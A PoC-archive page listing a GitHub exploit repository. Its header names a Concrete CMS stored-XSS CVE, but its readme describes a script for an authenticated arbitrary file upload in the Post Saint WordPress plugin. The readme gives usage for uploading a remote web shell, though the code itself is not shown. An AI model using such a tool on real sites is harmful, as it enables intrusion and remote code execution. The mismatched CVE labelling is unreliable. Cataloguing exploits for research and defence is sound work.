Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-1247 PoC — Concrete CMS version 9 before 9.2.5 vulnerable to stored XSS via the Role Name field

Source
https://github.com/Nxploited/CVE-2024-1247-PoC
Associated Vulnerability
Title:Concrete CMS version 9 before 9.2.5 vulnerable to stored XSS via the Role Name field (CVE-2024-1247)
Description:Concrete CMS version 9 before 9.2.5 is vulnerable to  stored XSS via the Role Name field since there is insufficient validation of administrator provided data for that field. A rogue administrator could inject malicious code into the Role Name field which might be executed when users visit the affected page. The Concrete CMS Security team scored this 2 with CVSS v3 vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator . Concrete versions below 9 do not include group types so they are not affected by this vulnerability.
Description
Post Saint <= 1.3.1 plugin for WordPress Arbitrary File Upload
Readme
# CVE-2024-1247-PoC
Post Saint &lt;= 1.3.1 plugin for WordPress Arbitrary File Upload 


# Description 
The **Post Saint** plugin for WordPress (versions up to and including 1.3.1) is vulnerable to arbitrary file uploads due to missing capability checks and file type validation. Authenticated attackers with at least subscriber-level access can exploit this vulnerability to upload arbitrary files, potentially leading to remote code execution.

### Features

- Detects vulnerable plugin versions.
- Logs into WordPress using provided credentials.
- Exploits the vulnerability to upload arbitrary files.

### Usage
#### Prerequisites
1. Install Python 3.8 or later.
2. Install the required libraries:


 ```
   
 pip install requests packaging urllib3
```


### Usage -help
```

 CVE-2024-12471 | Post Saint plugin for wordpress Arbitrary File Upload

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -ru REMOTE_URL, --remote_url REMOTE_URL
                        Remote URL of the shell file to inject

```

### Example:
```
python CVE-2024-12471.py -u <Base URL> -un <Username> -p <Password> -ru <Remote Shell URL>

```
### Disclaimer
This script is for educational and research purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.
File Snapshot

 [4.0K]  /data/pocs/97bad60c5d8d59f03675a535a8e4b4f9c7d19a52
├── [5.2K]  CVE-2024-12471.py
└── [1.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →